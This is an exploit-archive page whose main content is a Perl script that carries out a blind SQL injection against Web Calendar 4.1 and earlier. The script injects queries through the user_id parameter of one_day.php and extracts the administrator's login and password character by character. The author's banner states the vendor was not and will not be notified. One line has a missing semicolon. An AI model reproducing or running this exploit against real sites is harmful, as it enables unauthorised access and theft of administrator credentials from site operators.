what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

webcal-sql.txt

webcal-sql.txt
Posted Apr 23, 2008
Authored by t0pp8uzz

Web Calendar versions 4.1 and below blind SQL injection exploit.

tags | exploit, web, sql injection
SHA-256 | 0866b749c97f5d9f9a1dee969135913050291ee328e128627ae542caa88c78ce

webcal-sql.txt

Change Mirror Download
#!/usr/bin/perl

use strict;
use LWP::Simple;

print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";
print "-+-- --+-\n";
print "-+-- Discovered && Coded By t0pP8uZz --+-\n";
print "-+-- Discovered On: 24 April 2008 --+-\n";
print "-+-- --+-\n";
print "-+-- Web Calendar suffers from a insecure mysql query --+-\n";
print "-+-- the vendor has not been notified.. and wont be.. --+-\n";
print "-+-- --+-\n";
print "-+-- Exploit tested in ActivePerl --+-\n";
print "-+-- --+-\n";
print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";

print "\nEnter URL (ie: http://site.com/webcal/): ";
chomp(my $url=<STDIN>);

print "\n\nInjecting Please Wait..\n\n"

my $lop = 1;
my $num = 48;
my $sub = 1;
my $res = undef;
my $content = undef;

while($lop) {

$content = get($url."/one_day.php?user_id=1 AND ASCII(SUBSTRING((SELECT CONCAT(login,char(58),password,char(94)) FROM T_AUTH WHERE role_id=1 LIMIT 0,1),".$sub.",1))=".$num."/*");

if($content !~ /you are not in database/i && $num == 94) { $lop = 0; }
elsif($content !~ /you are not in database/i) { $res .= chr($num); $num = 48; $sub++; print $res."\n"; }
else { $num++; }
}

print "\nExploit Successfull! Admin Details Are: ".$res;

# Coded by t0pP8uZz

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close